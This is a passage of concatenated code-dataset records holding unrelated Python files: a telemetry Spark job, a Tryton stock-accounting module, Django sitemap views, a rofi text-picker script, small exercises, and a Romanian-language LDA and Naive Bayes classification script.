mode=\"overwrite\"))\n\n\n@click.command()\n@click.argument(\"start_date\")\n@click.argument(\"mode\", type=click.Choice([\"weekly\", \"monthly\"]))\n@click.argument(\"bucket\")\n@click.argument(\"prefix\")\n@click.option(\n \"--input_bucket\", default=\"telemetry-parquet\", help=\"Bucket of the input dataset\"\n)\n@click.option(\n \"--input_prefix\", default=\"main_summary/v4\", help=\"Prefix of the input dataset\"\n)\ndef main(start_date, mode, bucket, prefix, input_bucket, input_prefix):\n spark = SparkSession.builder.appName(\"topline_summary\").getOrCreate()\n\n version = 1\n source_path = format_spark_path(input_bucket, input_prefix)\n\n logger.info(\"Loading main_summary into memory...\")\n main_summary = extract(spark, source_path)\n\n logger.info(\"Running 
the topline summary...\")\n rollup = transform(main_summary, start_date, mode)\n\n logger.info(\"Saving rollup to disk...\")\n save(rollup, bucket, prefix, version, mode, start_date)\n","sub_path":"mozetl/topline/topline_summary.py","file_name":"topline_summary.py","file_ext":"py","file_size_in_byte":9463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"524911559","text":"# This file is part of Tryton. The COPYRIGHT file at the top level of\n# this repository contains the full copyright notices and license terms.\nfrom decimal import Decimal\n\nfrom trytond import backend\nfrom trytond.i18n import gettext\nfrom trytond.model import ModelView, fields\nfrom trytond.wizard import Wizard, StateView, StateTransition, Button\nfrom trytond.pyson import Eval\nfrom trytond.transaction import Transaction\nfrom trytond.pool import Pool, PoolMeta\n\nfrom trytond.modules.account_product.product import (\n account_used, template_property)\nfrom trytond.modules.product import price_digits\nfrom .exceptions import ModifyCostPriceError\n\n__all__ = ['Category', 'CategoryAccount', 'Template',\n 'Product', 'ModifyCostPriceAsk',\n 'ModifyCostPriceShowMove', 'ModifyCostPrice']\naccount_names = [\n 'account_stock', 'account_stock_supplier', 'account_stock_customer',\n 'account_stock_production', 'account_stock_lost_found']\n\n\nclass Category(metaclass=PoolMeta):\n __name__ = 'product.category'\n account_stock = fields.MultiValue(fields.Many2One(\n 'account.account', \"Account Stock\",\n domain=[\n ('type.stock', '=', True),\n ('company', '=', Eval('context', {}).get('company', -1)),\n ],\n states={\n 'invisible': (~Eval('context', {}).get('company')\n | Eval('account_parent')\n | ~Eval('accounting', False)),\n },\n depends=['account_parent', 'accounting']))\n account_stock_supplier = fields.MultiValue(fields.Many2One(\n 'account.account', \"Account Stock Supplier\",\n domain=[\n ('type.stock', '=', True),\n ('company', '=', Eval('context', {}).get('company', -1)),\n ],\n states={\n 'invisible': (~Eval('context', {}).get('company')\n | Eval('account_parent')\n | ~Eval('accounting', False)),\n },\n depends=['account_parent', 'accounting']))\n account_stock_customer = fields.MultiValue(fields.Many2One(\n 'account.account', \"Account Stock Customer\",\n domain=[\n ('type.stock', '=', True),\n ('company', '=', Eval('context', {}).get('company', -1)),\n ],\n states={\n 'invisible': (~Eval('context', {}).get('company')\n | Eval('account_parent')\n | ~Eval('accounting', False)),\n },\n depends=['account_parent', 'accounting']))\n account_stock_production = fields.MultiValue(fields.Many2One(\n 'account.account', \"Account Stock Production\",\n domain=[\n ('type.stock', '=', True),\n ('company', '=', Eval('context', {}).get('company', -1)),\n ],\n states={\n 'invisible': (~Eval('context', {}).get('company')\n | Eval('account_parent')\n | ~Eval('accounting', False)),\n },\n depends=['account_parent', 'accounting']))\n account_stock_lost_found = fields.MultiValue(fields.Many2One(\n 'account.account', \"Account Stock Lost and Found\",\n domain=[\n ('type.stock', '=', True),\n ('company', '=', Eval('context', {}).get('company', -1)),\n ],\n states={\n 'invisible': (~Eval('context', {}).get('company')\n | Eval('account_parent')\n | ~Eval('accounting', False)),\n },\n depends=['account_parent', 'accounting']))\n\n @classmethod\n def multivalue_model(cls, field):\n pool = Pool()\n if field in account_names:\n return pool.get('product.category.account')\n return 
super(Category, cls).multivalue_model(field)\n\n @property\n @account_used('account_stock')\n def account_stock_used(self):\n pass\n\n @property\n @account_used('account_stock_supplier')\n def account_stock_supplier_used(self):\n pass\n\n @property\n @account_used('account_stock_customer')\n def account_stock_customer_used(self):\n pass\n\n @property\n @account_used('account_stock_production')\n def account_stock_production_used(self):\n pass\n\n @property\n @account_used('account_stock_lost_found')\n def account_stock_lost_found_used(self):\n pass\n\n\nclass CategoryAccount(metaclass=PoolMeta):\n __name__ = 'product.category.account'\n account_stock = fields.Many2One(\n 'account.account', \"Account Stock\",\n domain=[\n ('type.stock', '=', True),\n ('type.statement', '=', 'balance'),\n ('company', '=', Eval('company', -1)),\n ],\n depends=['company'])\n account_stock_supplier = fields.Many2One(\n 'account.account', \"Account Stock Supplier\",\n domain=[\n ('type.stock', '=', True),\n ('type.statement', '=', 'income'),\n ('company', '=', Eval('company', -1)),\n ],\n depends=['company'])\n account_stock_customer = fields.Many2One(\n 'account.account', \"Account Stock Customer\",\n domain=[\n ('type.stock', '=', True),\n ('type.statement', '=', 'income'),\n ('company', '=', Eval('company', -1)),\n ],\n depends=['company'])\n account_stock_production = fields.Many2One(\n 'account.account', \"Account Stock Production\",\n domain=[\n ('type.stock', '=', True),\n ('type.statement', '=', 'income'),\n ('company', '=', Eval('company', -1)),\n ],\n depends=['company'])\n account_stock_lost_found = fields.Many2One(\n 'account.account', \"Account Stock Lost and Found\",\n domain=[\n ('type.stock', '=', True),\n ('type.statement', '=', 'income'),\n ('company', '=', Eval('company', -1)),\n ],\n depends=['company'])\n\n @classmethod\n def __register__(cls, module_name):\n TableHandler = backend.get('TableHandler')\n exist = TableHandler.table_exist(cls._table)\n if exist:\n table = cls.__table_handler__(module_name)\n exist &= all(table.column_exist(c) for c in account_names)\n\n super(CategoryAccount, cls).__register__(module_name)\n\n if not exist:\n # Re-migration\n cls._migrate_property([], [], [])\n\n @classmethod\n def _migrate_property(cls, field_names, value_names, fields):\n field_names.extend(account_names)\n value_names.extend(account_names)\n super(CategoryAccount, cls)._migrate_property(\n field_names, value_names, fields)\n\n\nclass Template(metaclass=PoolMeta):\n __name__ = 'product.template'\n\n @classmethod\n def __setup__(cls):\n super(Template, cls).__setup__()\n cls._modify_no_move.append(\n ('cost_price',\n 'account_stock_continental.msg_product_change_cost_price'))\n\n @property\n @account_used('account_stock', 'account_category')\n def account_stock_used(self):\n pass\n\n @property\n @account_used('account_stock_supplier', 'account_category')\n def account_stock_supplier_used(self):\n pass\n\n @property\n @account_used('account_stock_customer', 'account_category')\n def account_stock_customer_used(self):\n pass\n\n @property\n @account_used('account_stock_production', 'account_category')\n def account_stock_production_used(self):\n pass\n\n @property\n @account_used('account_stock_lost_found', 'account_category')\n def account_stock_lost_found_used(self):\n pass\n\n\nclass Product(metaclass=PoolMeta):\n __name__ = 'product.product'\n account_stock_used = template_property('account_stock_used')\n account_stock_supplier_used = template_property(\n 'account_stock_supplier_used')\n 
account_stock_customer_used = template_property(\n 'account_stock_customer_used')\n account_stock_production_used = template_property(\n 'account_stock_production_used')\n account_stock_lost_found_used = template_property(\n 'account_stock_lost_found_used')\n\n\nclass ModifyCostPriceAsk(ModelView):\n 'Modify Cost Price Ask'\n __name__ = 'product.modify_cost_price.ask'\n template = fields.Many2One('product.template', 'Product', readonly=True,\n states={\n 'invisible': ~Eval('template'),\n })\n product = fields.Many2One('product.product', 'Variant', readonly=True,\n states={\n 'invisible': ~Eval('product'),\n })\n cost_price = fields.Numeric('Cost Price', required=True,\n digits=price_digits)\n\n\nclass ModifyCostPriceShowMove(ModelView):\n 'Modify Cost Price Show Move'\n __name__ = 'product.modify_cost_price.show_move'\n price_difference = fields.Numeric('Price Difference', readonly=True,\n digits=price_digits)\n amount = fields.Numeric('Amount', readonly=True,\n digits=(16, Eval('currency_digits', 2)), depends=['currency_digits'])\n currency_digits = fields.Integer('Currency Digits', readonly=True)\n journal = fields.Many2One('account.journal', 'Journal', required=True)\n stock_account = fields.Many2One('account.account', 'Stock Account',\n readonly=True)\n counterpart = fields.Many2One('account.account', 'Counterpart',\n domain=[\n ('company', 'in',\n [Eval('context', {}).get('company', -1), None]),\n ('id', '!=', Eval('stock_account')),\n ('type.stock', '=', True),\n ],\n depends=['stock_account'], required=True)\n description = fields.Char('Description')\n\n\nclass ModifyCostPrice(Wizard):\n 'Modify Cost Price'\n __name__ = 'product.modify_cost_price'\n start_state = 'ask_price'\n ask_price = StateView('product.modify_cost_price.ask',\n 'account_stock_continental.modify_cost_price_ask_form', [\n Button('Cancel', 'end', 'tryton-cancel'),\n Button('OK', 'should_show_move', 'tryton-forward', default=True),\n ])\n should_show_move = StateTransition()\n show_move = StateView('product.modify_cost_price.show_move',\n 'account_stock_continental.modify_cost_price_show_move_form', [\n Button('Cancel', 'end', 'tryton-cancel'),\n Button('OK', 'create_move', 'tryton-ok', default=True),\n ])\n create_move = StateTransition()\n modify_price = StateTransition()\n\n def default_ask_price(self, fields):\n pool = Pool()\n Product = pool.get('product.product')\n\n context = Transaction().context\n default = {}\n product = Product(context['active_id'])\n default['product'] = product.id\n default['cost_price'] = getattr(\n product, 'recompute_cost_price_%s' % product.cost_price_method)()\n return default\n\n @staticmethod\n def get_product():\n 'Return the product instance'\n pool = Pool()\n Product = pool.get('product.product')\n context = Transaction().context\n return Product(context['active_id'])\n\n @classmethod\n def get_quantity(cls):\n pool = Pool()\n Date = pool.get('ir.date')\n Stock = pool.get('stock.location')\n\n locations = Stock.search([('type', '=', 'storage')])\n stock_date_end = Date.today()\n with Transaction().set_context(locations=[l.id for l in locations],\n stock_date_end=stock_date_end):\n product = cls.get_product()\n return product.quantity\n\n def transition_should_show_move(self):\n if self.get_quantity() != 0:\n return 'show_move'\n return 'modify_price'\n\n def default_show_move(self, fields):\n pool = Pool()\n User = pool.get('res.user')\n AccountConfiguration = pool.get('account.configuration')\n\n product = self.get_product()\n price_diff = (self.ask_price.cost_price\n - 
product.cost_price)\n user = User(Transaction().user)\n amount = user.company.currency.round(\n Decimal(str(self.get_quantity())) * price_diff)\n stock_account_id = product.account_stock_used.id\n config = AccountConfiguration(1)\n stock_journal_id = config.stock_journal.id\n counterpart_id = (config.cost_price_counterpart_account.id if\n config.cost_price_counterpart_account else None)\n return {\n 'journal': stock_journal_id,\n 'amount': amount,\n 'price_difference': price_diff,\n 'stock_account': stock_account_id,\n 'counterpart': counterpart_id,\n 'currency_digits': user.company.currency.digits,\n }\n\n def get_move_lines(self):\n Line = Pool().get('account.move.line')\n amount = self.show_move.amount\n return [Line(\n debit=amount if amount > 0 else 0,\n credit=-amount if amount < 0 else 0,\n account=self.show_move.stock_account,\n ),\n Line(\n debit=-amount if amount < 0 else 0,\n credit=amount if amount > 0 else 0,\n account=self.show_move.counterpart,\n ),\n ]\n\n def get_move(self):\n pool = Pool()\n Date = pool.get('ir.date')\n Period = pool.get('account.period')\n User = pool.get('res.user')\n Move = pool.get('account.move')\n\n user = User(Transaction().user)\n period_id = Period.find(user.company.id)\n return Move(\n description=self.show_move.description,\n period=period_id,\n journal=self.show_move.journal,\n date=Date.today(),\n origin=self.get_product(),\n lines=self.get_move_lines(),\n )\n\n def transition_create_move(self):\n Move = Pool().get('account.move')\n\n if self.show_move.counterpart == self.show_move.stock_account:\n raise ModifyCostPriceError(\n gettext('account_stock_continental'\n '.msg_modify_cost_price_same_account',\n account=self.show_move.counterpart.rec_name))\n move = self.get_move()\n move.save()\n Move.post([move])\n return 'modify_price'\n\n def transition_modify_price(self):\n self.ask_price.product.set_multivalue(\n 'cost_price', self.ask_price.cost_price)\n return 'end'\n","sub_path":"account_stock_continental/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":14487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"635005469","text":"from django.http import HttpResponse, Http404\r\nfrom django.template import loader\r\nfrom django.contrib.sites.models import get_current_site\r\nfrom django.core import urlresolvers\r\nfrom django.utils.encoding import smart_str\r\nfrom django.core.paginator import EmptyPage, PageNotAnInteger\r\n\r\ndef index(request, sitemaps):\r\n current_site = get_current_site(request)\r\n sites = []\r\n protocol = request.is_secure() and 'https' or 'http'\r\n for section, site in sitemaps.items():\r\n site.request = request\r\n if callable(site):\r\n pages = site().paginator.num_pages\r\n else:\r\n pages = site.paginator.num_pages\r\n sitemap_url = urlresolvers.reverse('django.contrib.sitemaps.views.sitemap', kwargs={'section': section})\r\n sites.append('%s://%s%s' % (protocol, current_site.domain, sitemap_url))\r\n if pages > 1:\r\n for page in range(2, pages+1):\r\n sites.append('%s://%s%s?p=%s' % (protocol, current_site.domain, sitemap_url, page))\r\n xml = loader.render_to_string('sitemap_index.xml', {'sitemaps': sites})\r\n return HttpResponse(xml, mimetype='application/xml')\r\n\r\ndef sitemap(request, sitemaps, section=None):\r\n maps, urls = [], []\r\n if section is not None:\r\n if section not in sitemaps:\r\n raise Http404(\"No sitemap available for section: %r\" % section)\r\n maps.append(sitemaps[section])\r\n else:\r\n maps = 
sitemaps.values()\r\n page = request.GET.get(\"p\", 1)\r\n current_site = get_current_site(request)\r\n for site in maps:\r\n try:\r\n if callable(site):\r\n urls.extend(site().get_urls(page=page, site=current_site))\r\n else:\r\n urls.extend(site.get_urls(page=page, site=current_site))\r\n except EmptyPage:\r\n raise Http404(\"Page %s empty\" % page)\r\n except PageNotAnInteger:\r\n raise Http404(\"No page '%s'\" % page)\r\n xml = smart_str(loader.render_to_string('sitemap.xml', {'urlset': urls}))\r\n return HttpResponse(xml, mimetype='application/xml')\r\n","sub_path":"django/contrib/sitemaps/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"282706981","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport argparse\nimport fnmatch\nimport os\nimport shlex\nimport sys\nfrom subprocess import run\nfrom typing import List, Tuple\n\nimport configargparse\nfrom xdg import BaseDirectory\n\nfrom rofigeneric.Clipboarder import Clipboarder\nfrom rofigeneric.Typer import Typer\n\n\nclass RofiGeneric:\n def __init__(self) -> None:\n self.args = self.parse_arguments()\n self.typer = Typer.best_option(self.args.typer)\n self.clipboarder = Clipboarder.best_option(self.args.clipboarder)\n self.active_window = self.typer.get_active_window()\n\n returncode, stdout = self.open_main_rofi_window()\n\n if returncode == 1:\n sys.exit()\n else:\n if 10 <= returncode <= 19:\n self.default_handle_recent_character(returncode - 9)\n else:\n # for now we assume stdout is a single line\n assert len(stdout.splitlines()) == 1\n\n # TODO(g.seux): we can easily make extraction of the line configurable\n # for now we select the first word\n output=stdout.split()[0]\n\n # TODO(g.seux): deal with history\n # self.save_characters_to_recent_file(characters)\n\n if returncode == 0:\n self.default_handle(output)\n #elif returncode == 20:\n # self.clipboarder.copy_characters_to_clipboard(characters)\n #elif returncode == 21:\n # self.typer.type_characters(characters, self.active_window)\n #elif returncode == 22:\n # self.clipboarder.copy_paste_characters(characters, self.active_window, self.typer)\n #elif returncode == 23:\n # self.default_handle(self.get_codepoints(characters))\n #elif returncode == 24:\n # self.clipboarder.copy_characters_to_clipboard(self.get_codepoints(characters))\n\n def parse_arguments(self) -> argparse.Namespace:\n parser = configargparse.ArgumentParser(\n description='Select, insert or copy Unicode characters using rofi.',\n default_config_files=[os.path.join(directory, 'rofigeneric.rc') for directory in\n BaseDirectory.xdg_config_dirs]\n )\n parser.add_argument('--version', action='version', version='rofi-generic 0.1.0')\n parser.add_argument(\n '--insert-with-clipboard',\n '-p',\n dest='insert_with_clipboard',\n action='store_true',\n help='Do not type the character directly, but copy it to the clipboard, insert it from '\n 'there and then restore the clipboard\\'s original value '\n )\n parser.add_argument(\n '--copy-only',\n '-c',\n dest='copy_only',\n action='store_true',\n help='Only copy the character to the clipboard but do not insert it'\n )\n parser.add_argument(\n '--input-files',\n '-f',\n dest='files',\n action='store',\n default=[],\n nargs='+',\n metavar='FILE',\n help='Read text from files'\n )\n parser.add_argument(\n '--prompt',\n '-r',\n dest='prompt',\n action='store',\n default='😀 ',\n help='Set rofi-generic\\'s prompt'\n )\n 
parser.add_argument(\n '--rofi-args',\n dest='rofi_args',\n action='store',\n default='',\n help='A string of arguments to give to rofi'\n )\n parser.add_argument(\n '--max-recent',\n dest='max_recent',\n action='store',\n type=int,\n default=10,\n help='Show at most this number of recently used words (cannot be larger than 10)'\n )\n parser.add_argument(\n '--clipboarder',\n dest='clipboarder',\n action='store',\n type=str,\n default=None,\n help='Choose the application to access the clipboard with'\n )\n parser.add_argument(\n '--typer',\n dest='typer',\n action='store',\n type=str,\n default=None,\n help='Choose the application to type with'\n )\n\n parsed_args = parser.parse_args()\n parsed_args.rofi_args = shlex.split(parsed_args.rofi_args)\n\n return parsed_args\n\n def read_input_files(self) -> str:\n entries = []\n\n for file_name in self.args.files:\n entries = entries + self.load_from_file(file_name)\n\n return entries\n\n def load_from_file(self, file_name: str) -> str:\n if os.path.isfile(file_name):\n actual_file_name = file_name\n else:\n raise FileNotFoundError(f\"Couldn't find file {file_name}\")\n\n with open(actual_file_name, \"r\") as file:\n return file.readlines()\n\n def load_all_characters(self) -> str:\n characters = \"\"\n\n directory = os.path.join(os.path.dirname(__file__), \"data\")\n for filename in os.listdir(directory):\n with open(os.path.join(directory, filename), \"r\") as file:\n characters = characters + file.read()\n return characters\n\n def load_recent_characters(self, max: int) -> List[str]:\n try:\n with open(os.path.join(BaseDirectory.xdg_data_home, 'rofi-generic', 'recent'), 'r') as file:\n return file.read().strip().split('\\n')[:max]\n except FileNotFoundError:\n return []\n\n def format_recent_characters(self) -> str:\n pairings = [f'{(index + 1) % 10}: {character}' for index, character in\n enumerate(self.load_recent_characters(self.args.max_recent))]\n\n return ' | '.join(pairings)\n\n def open_main_rofi_window(self) -> Tuple[int, str]:\n rofi_args = self.args.rofi_args\n lines = self.read_input_files()\n prompt = self.args.prompt\n\n parameters = [\n 'rofi',\n '-dmenu',\n '-markup-rows',\n '-i',\n '-multi-select',\n '-p',\n prompt,\n '-kb-custom-11',\n 'Alt+c',\n '-kb-custom-12',\n 'Alt+t',\n '-kb-custom-13',\n 'Alt+p',\n '-kb-custom-14',\n 'Alt+u',\n '-kb-custom-15',\n 'Alt+i',\n *rofi_args\n ]\n\n # TODO(g.seux): deal with recent selections\n #recent_characters = self.format_recent_characters()\n #if len(recent_characters) > 0:\n # parameters.extend(['-mesg', recent_characters])\n\n rofi = run(\n parameters,\n input=''.join(lines),\n capture_output=True,\n encoding='utf-8'\n )\n return rofi.returncode, rofi.stdout\n\n def process_chosen_characters(\n self,\n chosen_characters: List[str]\n ) -> str:\n\n result = \"\"\n for line in chosen_characters:\n character = line.split(\" \")[0]\n\n characters_with_skin_tone = ''\n for element in character:\n if element in self.skin_tone_selectable_emojis:\n characters_with_skin_tone += self.select_skin_tone(element)\n else:\n characters_with_skin_tone += element\n\n result += characters_with_skin_tone\n\n return result\n\n def save_characters_to_recent_file(self, characters: str):\n max_recent_from_conf = self.args.max_recent\n\n old_file_name = os.path.join(BaseDirectory.xdg_data_home, 'rofi-generic', 'recent')\n new_file_name = os.path.join(BaseDirectory.xdg_data_home, 'rofi-generic', 'recent_temp')\n\n max_recent = min(max_recent_from_conf, 10)\n\n os.makedirs(os.path.dirname(new_file_name), 
exist_ok=True)\n with open(new_file_name, 'w+') as new_file:\n new_file.write(characters + '\\n')\n\n try:\n with open(old_file_name, 'r') as old_file:\n index = 0\n for line in old_file:\n if characters == line.strip():\n continue\n if index == max_recent - 1:\n break\n new_file.write(line)\n index = index + 1\n\n os.remove(old_file_name)\n except FileNotFoundError:\n pass\n\n os.rename(new_file_name, old_file_name)\n\n def append_to_favorites_file(self, characters: str):\n file_name = os.path.join(BaseDirectory.xdg_data_home, 'rofi-generic', 'favorites')\n\n os.makedirs(os.path.dirname(file_name), exist_ok=True)\n with open(file_name, 'a+') as file:\n file.write(characters + '\\n')\n\n def default_handle(self, output: str):\n if self.args.copy_only:\n self.clipboarder.copy_characters_to_clipboard(output)\n elif self.args.insert_with_clipboard:\n self.clipboarder.copy_paste_characters(output, self.active_window, self.typer)\n else:\n self.typer.type_characters(output, self.active_window)\n\n def default_handle_recent_character(self, position: int):\n recent_characters = self.load_recent_characters(position)\n\n self.default_handle(recent_characters[position - 1].strip())\n\n\ndef main():\n RofiGeneric()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"rofigeneric/RofiGeneric.py","file_name":"RofiGeneric.py","file_ext":"py","file_size_in_byte":9571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"390986091","text":"\nimport math\ndef primecheck(t):\n for i in range(2,min(int(t**0.5+1),100)):\n if t%i==0:\n return False\n return True\n\ndef divisorreturn(t):\n for i in range(2,int(t**0.5+1)):\n if t%i==0:\n return str(i)\t\n\nN=30\nresult=[]\nfor i in range(int(\"1\"*N,2)+1):\n temp=bin(i)[2:]\n while len(temp) max([sz[\"max\"] for sz in tables]):\n\t\tprint(\"I'm sorry, our tables do not hold parties of that size.\")\n\telif size == 0:\n\t\tprint(\"\\nI see the line is now empty. We are closing for the evening.\\n\")\n\t\tbreak\n\telse:\n\t\t# Only add party to the wait list if that name is not already on it.\n\t\tw = input(\"You will need to wait for a table. What is your name? \")\n\t\n\t\tif w not in wait.keys():\n\t\t\twait[w] = size\n\t\t\tnumber_waiting = len(wait.keys())\n\t\t\tprint(\"Approximate wait time is \",5*number_waiting, \" minutes.\")\n\t\telse:\n\t\t\tprint(\"I'm sorry, we can't serve you tonight. 
There is already a customer by that name.\")\n\t\n","sub_path":"sessions/2014/flowcontrol/.ex4.soln.py","file_name":".ex4.soln.py","file_ext":"py","file_size_in_byte":2594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"64341558","text":"if (__name__ == \"__main__\"):\r\n    import sys\r\n\r\ndef time(steps, per_step=1, path= \"time.dat\"):\r\n    time_file = open(path,\"w+\")\r\n    \r\n    for i in range(1,steps,1): # Step size is always 1 since this is just used for number of lines.\r\n        time_file.write(\"{0}\\n\".format(i*per_step)) # Default per_step = 1 ps\r\n    time_file.close() #\r\n\r\nif (__name__ == \"__main__\"):\r\n    steps = int(sys.argv[1])\r\n    time(steps)\r\n","sub_path":"protein_scripts/time_dat.py","file_name":"time_dat.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"442060509","text":"import pandas as pd\r\nimport numpy as np\r\nimport sklearn.discriminant_analysis as discrim\r\nimport sklearn.metrics as metrics\r\nimport sklearn.naive_bayes as nb\r\nimport sklearn.svm as svm\r\nimport sklearn.tree as tree\r\nimport grafice\r\n\r\n# Read the data and build a dataframe with the pandas library\r\ntabel = pd.read_csv(\"Date2019.csv\", index_col=0)\r\npd.set_option('display.max_columns', None)\r\n#print(tabel)\r\n\r\n# Replace the missing values with the mean\r\ntabel.replace(\" \", np.nan, inplace=True)\r\ndate_lipsa = tabel.isnull()\r\n#print(date_lipsa)\r\n\r\n# for column in date_lipsa.columns.values.tolist():\r\n#     print(column)\r\n#     print(date_lipsa[column].value_counts())\r\n#     print(\"\")\r\n\r\n# Missing data: SalariuMediu, ProcentSalariuMinim, ExportImportRatio\r\nmedie_sal_mediu = tabel[\"SalariuMediu\"].astype(\"float\").mean(axis=0)\r\nprint(\"The mean of the average salary is:\", medie_sal_mediu)\r\ntabel[\"SalariuMediu\"].replace(np.nan, medie_sal_mediu, inplace=True)\r\n\r\nmedie_procent_sal_minim = tabel[\"ProcentSalariuMinim\"].astype(\"float\").mean(axis=0)\r\nprint(\"The mean percentage of employees paid the national minimum wage is:\", medie_procent_sal_minim)\r\ntabel[\"ProcentSalariuMinim\"].replace(np.nan, medie_procent_sal_minim, inplace=True)\r\n\r\nmedie_expimp_ratio = tabel[\"ExportImportRatio\"].astype(\"float\").mean(axis=0)\r\nprint(\"The mean export-to-import ratio is:\", medie_expimp_ratio)\r\ntabel[\"ExportImportRatio\"].replace(np.nan, medie_expimp_ratio, inplace=True)\r\n\r\n# Descriptive statistics\r\nindicatori_numerici = tabel.describe()\r\n#print(indicatori_numerici)\r\nindicatori_numerici.to_csv(\"Indicatori.csv\")\r\nprint(tabel.describe())\r\n\r\n# Apply the LDA classification model\r\nvariabile = list(tabel)\r\nnr_variabile = len(variabile)\r\nvariabile_predictor = variabile[:(nr_variabile - 1)]\r\nvariabila_tinta = variabile[nr_variabile - 1]\r\nprint(\"The target variable is:\", variabila_tinta)\r\nprint(\"The predictor variables are:\", variabile_predictor)\r\n\r\nx = tabel[variabile_predictor].values\r\ny = tabel[variabila_tinta].values\r\n# print(type(x))\r\n# print(type(y))\r\n\r\n\r\n# Build the model and fetch the region labels\r\nmodel_lda = discrim.LinearDiscriminantAnalysis()\r\nmodel_lda.fit(x, np.ravel(y))\r\nregiuni = model_lda.classes_\r\nprint(\"Regions:\", regiuni)\r\n\r\n# Fetch the results and apply the model\r\n# Compute the discriminant scores\r\nz = model_lda.transform(x)\r\nn, q = z.shape\r\netichete_z = [\"z\" + str(i) for i in range(1, q + 1)]\r\nnume_instante = list(tabel.index)\r\n\r\n# Score table\r\nt_z = pd.DataFrame(z, nume_instante, etichete_z)\r\nt_z.to_csv(\"z.csv\")\r\n\r\n# Compute the group centroids\r\ng = model_lda.means_\r\nzg = model_lda.transform(g)\r\nif q > 1:\r\n    grafice.biplot(z, zg, y, regiuni)\r\nfor i in range(q):\r\n    grafice.distributie(z,i,y,regiuni)\r\n\r\n# Classification on the training set\r\nclasificare_b = model_lda.predict(x)\r\ntabel_clasificare_b = pd.DataFrame(\r\n    data={\r\n        \"Regiunea\": y,\r\n        \"Predictie\": clasificare_b\r\n    }, index=nume_instante\r\n)\r\ntabel_clasificare_b.to_csv(\"clasif_b.csv\")\r\n\r\n# Isolate the misclassified instances\r\ntabel_clasificare_err = tabel_clasificare_b[y != clasificare_b]\r\n#tabel_clasificare_err.to_csv(\"clasif_eronata.csv\")\r\n\r\n# Compute the confusion matrix and accuracy on the training set\r\nmat_conf = metrics.confusion_matrix(y, clasificare_b)\r\nt_mat_conf = pd.DataFrame(mat_conf, regiuni, regiuni)\r\nt_mat_conf[\"Acuratete\"] = np.diagonal(mat_conf) * 100 / np.sum(mat_conf, axis=1)\r\nprint(t_mat_conf)\r\n#t_mat_conf.to_csv(\"mat_conf.csv\")\r\nacuratete_globala = sum(np.diagonal(mat_conf)) * 100 / n\r\nprint(\"Overall accuracy:\", sum(np.diagonal(mat_conf)) * 100 / n)\r\n\r\n\r\n# Apply the model to the test set (2014 data)\r\nset_testare = pd.read_csv(\"Date2014.csv\", index_col=0)\r\nx_testare = set_testare[variabile_predictor].values\r\npredictie = model_lda.predict(x_testare)\r\nset_testare[\"Predictie_lda\"] = predictie\r\n\r\n# Classification on the test set\r\nclasificare_test = pd.DataFrame(\r\n    data = {\r\n        \"Regiunea\" : y,\r\n        \"Predictie\" : predictie\r\n    }, index=nume_instante\r\n)\r\nclasificare_test.to_csv(\"clasif_test.csv\")\r\n\r\n# Isolate the misclassified instances\r\ntabel_clasificare_err_test = clasificare_test[y != predictie]\r\n#tabel_clasificare_err_test.to_csv(\"clasif_eronata_test.csv\")\r\n\r\n# Compute the confusion matrix and accuracy on the test set\r\nmat_conf_test = metrics.confusion_matrix(y, predictie)\r\nt_mat_conf_test = pd.DataFrame(mat_conf_test, regiuni,regiuni)\r\nt_mat_conf_test[\"Acuratete\"] = np.diagonal(mat_conf_test) * 100 / np.sum(mat_conf_test, axis=1)\r\nprint(t_mat_conf_test)\r\n#t_mat_conf_test.to_csv(\"mat_conf_test.csv\")\r\nacuratete_test = sum(np.diagonal(mat_conf_test)) * 100 / n\r\nprint(\"Overall accuracy on the test set:\", sum(np.diagonal(mat_conf_test)) * 100 / n)\r\n#\r\n# Build the naive Bayes model\r\nmodel_bayes = nb.GaussianNB()\r\nmodel_bayes.fit(x, y)\r\n\r\n# Classification on the training set\r\nclasificare_b_bayes = model_bayes.predict(x)\r\ntabel_clasificare_b_bayes = pd.DataFrame(\r\n    data = {\r\n        \"Regiunea\" : y,\r\n        \"Predictie\": clasificare_b_bayes\r\n    },index=nume_instante\r\n)\r\ntabel_clasificare_b_bayes.to_csv(\"clasif_b_bayes.csv\")\r\n\r\n# Isolate the misclassified instances\r\ntabel_clasificare_err_bayes = tabel_clasificare_b_bayes[y != clasificare_b_bayes]\r\n#tabel_clasificare_err_bayes.to_csv(\"clasif_eronata_bayes.csv\")\r\n\r\n# Compute the confusion matrix and accuracy on the training set\r\nmat_conf_bayes = metrics.confusion_matrix(y, clasificare_b_bayes)\r\nt_mat_conf_bayes = pd.DataFrame(mat_conf_bayes, regiuni, regiuni)\r\nt_mat_conf_bayes[\"Acuratete\"] = np.diagonal(mat_conf_bayes) * 100 / np.sum(mat_conf_bayes, axis=1)\r\nprint(t_mat_conf_bayes)\r\n#t_mat_conf_bayes.to_csv(\"mat_conf_bayes.csv\")\r\nacuratete_globala_bayes = sum(np.diagonal(mat_conf_bayes)) * 100 / n\r\nprint(\"Overall accuracy of the Bayes model:\", sum(np.diagonal(mat_conf_bayes)) * 100 / n)\r\n\r\n\r\n# Apply the model to the test set (2014 data)\r\npredictie_bayes = model_bayes.predict(x_testare)\r\nset_testare[\"Predictie_Bayes\"] = predictie_bayes\r\n\r\n# Classification on the test set\r\nclasificare_test_bayes = pd.DataFrame(\r\n    data = {\r\n        \"Regiunea\" : y,\r\n        \"Predictie\" : predictie_bayes\r\n    }, index=nume_instante\r\n)\r\nclasificare_test_bayes.to_csv(\"clasif_test_bayes.csv\")\r\n\r\n# Isolate the misclassified instances\r\ntabel_clasificare_err_test_bayes = clasificare_test_bayes[y != predictie_bayes]\r\n# 